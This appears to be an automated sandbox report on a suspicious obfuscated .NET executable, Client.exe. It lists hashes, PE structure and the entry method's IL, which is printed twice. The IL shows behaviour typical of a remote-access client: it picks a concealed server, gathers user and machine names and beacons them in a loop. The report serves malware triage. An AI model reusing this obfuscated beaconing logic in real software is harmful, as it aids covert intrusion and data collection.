Suspicious
Suspect

3eb09496802aaab8b7351b574c30c23a

PE Executable
|
MD5: 3eb09496802aaab8b7351b574c30c23a
|
Size: 312.83 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
3eb09496802aaab8b7351b574c30c23a
Sha1
8188e9a6ebd71f8d8e880b17150218aadfa15664
Sha256
5eb5f76e34f39dc726619b00d1456961c39e1213ddf20507683c04b30bcd636b
Sha384
6b5d52cfee85aba9b3e043a4f20844e4b7b3a1b6909d93b67d33f5c885eaa35a9d19ada942d7806ab6a2ee74b9bf13bf
Sha512
bd7ec66e362f787174978abd83e715f799a90996cf187a8f278b4ee7a0aea3142e1baa8393ea701111ed53351b48565e7553e415ff07c7507149f1eb25ce6772
SSDeep
6144:n/SNznlWXy14nPg8mkvx6hQ89oYaFRzcvbZSkIARKz:/SNznlZnQ87aFCVSksz
TLSH
F464A5253FA59E10D985243ECA7E3A09CB62E0F125026347370AF7A15D059EEDE6C3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
3eb09496802aaab8b7351b574c30c23a
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
w0kgn9mk1ztocfrr6vunfxe1
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void JeAOVxuTQsCF.sjQTpMSxPJE::IbtskpQHRLmLnFqWcSXs(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

419
Main Method

System.Void JeAOVxuTQsCF.sjQTpMSxPJE::IbtskpQHRLmLnFqWcSXs(System.String[])
Main IL Instruction Count

167
Main IL

ldc.r8 3579 stloc V_3 br IL_004F: br IL_0012 nop <null> ldloc V_3 ldc.r8 3579 ceq <null> brfalse IL_0035: nop nop <null> ldc.r8 3584 stloc V_3 nop <null> ldloc V_3 ldc.r8 3584 ceq <null> brfalse IL_004F: br IL_0012 br IL_0054: call System.Void JeAOVxuTQsCF.asoFTtyQyi::AripyYMZxORTljVTKe() br IL_0012: nop call System.Void JeAOVxuTQsCF.asoFTtyQyi::AripyYMZxORTljVTKe() call System.Void EJAsZCuMLFcstN.kxbFEqvHHkkbEFCnnEg::rlvSGYxacu() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::CfYkmDIkClAerx call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cndoOzVDtEvBdksb() call System.String pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_007C: ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::tSBOFJacMihjUfODdf call System.Void DHgKbieAxMsNZmBPKhsiZyW.BbVrVuWBvUDyQm::uSSjmXAnaL() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::tSBOFJacMihjUfODdf call System.Boolean WKYbVPjvlKgtxhNogc.PfEwgwXJnwd::RBuoOHBbGfbjpAdpdF(System.String) brtrue IL_0090: call System.Void pNiCXJnBMURAHNEa.ERjocsDisAcsTVnUf::skUkVrZtFC() leave IL_0293: ret call System.Void pNiCXJnBMURAHNEa.ERjocsDisAcsTVnUf::skUkVrZtFC() call System.Void DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::urUZUFyJALXUvk() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldfld System.Boolean DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::GnyLSulEZtzb brtrue IL_027E: call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::OyAfASQVkYXIbUKbXorZY call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::RbTkVtmhezqdmbnEJtIXMPSyz() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::BIYnfxawjN() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::yCOazJtvNQZprDrznkBIU() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::iISbmZeXSskcVbwX ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::TreIqTtCqraTKqtwMGZDm() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cSgkoxnLhEQNjWwqSZBKa() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::OXsBGqYvjRyhPLbGfwPe() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::VDwGXAVnABbL() ldelem System.String call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DIrmqwnmVyPCGkPMtFvwYtUv() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::jqCIiQWWVHSOtFSrXzEhEQPG() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::GvgPVKowsHGlenisgl() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::KSGenUbRqNhdGXaHvXTofkZaw() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldloc V_1 call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::wyAAdFBuPOpSavhcUq() ldelem System.String ldloc V_2 ldsfld System.Random DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::iISbmZeXSskcVbwX ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::cyLCSZMUkNvC(System.String,System.String) ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldfld System.Boolean DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::GnyLSulEZtzb brfalse IL_027E: call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc newobj System.Void DHgKbieAxMsNZmBPKhsiZyW.AeRMGSSbZljmnVHh::.ctor(DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG) stfld DHgKbieAxMsNZmBPKhsiZyW.AeRMGSSbZljmnVHh DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::jhFjBrOWBMWUBIeCHqBSTf ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc newobj System.Void DHgKbieAxMsNZmBPKhsiZyW.MVDsfOjUxeKILNi::.ctor(DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG) stfld DHgKbieAxMsNZmBPKhsiZyW.MVDsfOjUxeKILNi DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::ZjaNGiZfoKfmpqyLnGmFb ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::zxeRAxLFtMWo() newarr System.Object dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::fmKcFvDJUPYiCofpw() call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cBJgghaJTyznFynf() call System.String pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::OCZlfRgzCRzIi() call System.Byte[] DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::VDUEQQQHRURRDkXobkJRymwe() stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::ZRnolFWYnxfhFjyJgQwBHmzu() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zxpaYxTWSNi stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::tvGtlKMheJk() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::smqSlOMpaF stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::rEropOcGyL() call System.String System.Environment::get_UserName() call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::PHtnXRtGMdUgIA() call System.String pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::AskiLglmStisKQeBmSzaaNHpM() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zUikYgRthCBmCiRkAl stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::MSXXoHhxFAB() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::eAADNDPTdFwtjvVVH stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::ABsWSIJLgYKNpnzkXn() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::jrywraGGIqjhH stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::vVGUTOvFaKMKeAJSyhDvz() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::yoQJVYhTRtOSYSNmkdtrXZ stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::AYnHKhAIwaSQFGugZHX() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::LTwbyQUhJNookISrhNJaQ stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::iBUNgNfVAC() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::IcunUMKUcUhmuzMhSKdfNIyDq stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::rkPVhgLENEROlsN() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zTePOWPuRWkbxYbQxIPLS stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DXRIwXwwzDZbxBfHtHafplNA() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::mYWfFwEFDnMoTuHVO stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DJyRmjVSScxjuW() call System.String DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::KxqRMqSiZBloyDOYEApvqX() stelem.ref <null> call System.Byte[] pNiCXJnBMURAHNEa.bZnnVamFrANlYP::SwZrNYQnvdiLDtykVipakCpqo(System.Object[]) callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::oCpsjkCcYxcPPTVKtRYfBzpSu(System.Byte[]) call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_009A: ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc pop <null> leave IL_0293: ret ret <null>
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void JeAOVxuTQsCF.sjQTpMSxPJE::IbtskpQHRLmLnFqWcSXs(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

419
Main Method

System.Void JeAOVxuTQsCF.sjQTpMSxPJE::IbtskpQHRLmLnFqWcSXs(System.String[])
Main IL Instruction Count

167
Main IL

ldc.r8 3579 stloc V_3 br IL_004F: br IL_0012 nop <null> ldloc V_3 ldc.r8 3579 ceq <null> brfalse IL_0035: nop nop <null> ldc.r8 3584 stloc V_3 nop <null> ldloc V_3 ldc.r8 3584 ceq <null> brfalse IL_004F: br IL_0012 br IL_0054: call System.Void JeAOVxuTQsCF.asoFTtyQyi::AripyYMZxORTljVTKe() br IL_0012: nop call System.Void JeAOVxuTQsCF.asoFTtyQyi::AripyYMZxORTljVTKe() call System.Void EJAsZCuMLFcstN.kxbFEqvHHkkbEFCnnEg::rlvSGYxacu() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::CfYkmDIkClAerx call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cndoOzVDtEvBdksb() call System.String pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_007C: ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::tSBOFJacMihjUfODdf call System.Void DHgKbieAxMsNZmBPKhsiZyW.BbVrVuWBvUDyQm::uSSjmXAnaL() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::tSBOFJacMihjUfODdf call System.Boolean WKYbVPjvlKgtxhNogc.PfEwgwXJnwd::RBuoOHBbGfbjpAdpdF(System.String) brtrue IL_0090: call System.Void pNiCXJnBMURAHNEa.ERjocsDisAcsTVnUf::skUkVrZtFC() leave IL_0293: ret call System.Void pNiCXJnBMURAHNEa.ERjocsDisAcsTVnUf::skUkVrZtFC() call System.Void DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::urUZUFyJALXUvk() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldfld System.Boolean DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::GnyLSulEZtzb brtrue IL_027E: call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::OyAfASQVkYXIbUKbXorZY call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::RbTkVtmhezqdmbnEJtIXMPSyz() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::BIYnfxawjN() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::yCOazJtvNQZprDrznkBIU() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::iISbmZeXSskcVbwX ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::TreIqTtCqraTKqtwMGZDm() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cSgkoxnLhEQNjWwqSZBKa() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::OXsBGqYvjRyhPLbGfwPe() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::VDwGXAVnABbL() ldelem System.String call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DIrmqwnmVyPCGkPMtFvwYtUv() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::jqCIiQWWVHSOtFSrXzEhEQPG() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::GvgPVKowsHGlenisgl() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::KSGenUbRqNhdGXaHvXTofkZaw() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldloc V_1 call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::wyAAdFBuPOpSavhcUq() ldelem System.String ldloc V_2 ldsfld System.Random DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::iISbmZeXSskcVbwX ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::cyLCSZMUkNvC(System.String,System.String) ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldfld System.Boolean DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::GnyLSulEZtzb brfalse IL_027E: call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc newobj System.Void DHgKbieAxMsNZmBPKhsiZyW.AeRMGSSbZljmnVHh::.ctor(DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG) stfld DHgKbieAxMsNZmBPKhsiZyW.AeRMGSSbZljmnVHh DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::jhFjBrOWBMWUBIeCHqBSTf ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc newobj System.Void DHgKbieAxMsNZmBPKhsiZyW.MVDsfOjUxeKILNi::.ctor(DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG) stfld DHgKbieAxMsNZmBPKhsiZyW.MVDsfOjUxeKILNi DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::ZjaNGiZfoKfmpqyLnGmFb ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::zxeRAxLFtMWo() newarr System.Object dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::fmKcFvDJUPYiCofpw() call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cBJgghaJTyznFynf() call System.String pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::OCZlfRgzCRzIi() call System.Byte[] DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::VDUEQQQHRURRDkXobkJRymwe() stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::ZRnolFWYnxfhFjyJgQwBHmzu() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zxpaYxTWSNi stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::tvGtlKMheJk() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::smqSlOMpaF stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::rEropOcGyL() call System.String System.Environment::get_UserName() call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::PHtnXRtGMdUgIA() call System.String pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::AskiLglmStisKQeBmSzaaNHpM() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zUikYgRthCBmCiRkAl stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::MSXXoHhxFAB() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::eAADNDPTdFwtjvVVH stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::ABsWSIJLgYKNpnzkXn() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::jrywraGGIqjhH stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::vVGUTOvFaKMKeAJSyhDvz() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::yoQJVYhTRtOSYSNmkdtrXZ stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::AYnHKhAIwaSQFGugZHX() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::LTwbyQUhJNookISrhNJaQ stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::iBUNgNfVAC() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::IcunUMKUcUhmuzMhSKdfNIyDq stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::rkPVhgLENEROlsN() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zTePOWPuRWkbxYbQxIPLS stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DXRIwXwwzDZbxBfHtHafplNA() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::mYWfFwEFDnMoTuHVO stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DJyRmjVSScxjuW() call System.String DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::KxqRMqSiZBloyDOYEApvqX() stelem.ref <null> call System.Byte[] pNiCXJnBMURAHNEa.bZnnVamFrANlYP::SwZrNYQnvdiLDtykVipakCpqo(System.Object[]) callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::oCpsjkCcYxcPPTVKtRYfBzpSu(System.Byte[]) call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_009A: ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc pop <null> leave IL_0293: ret ret <null>
3eb09496802aaab8b7351b574c30c23a (312.83 KB)
File Structure
3eb09496802aaab8b7351b574c30c23a
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
w0kgn9mk1ztocfrr6vunfxe1
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙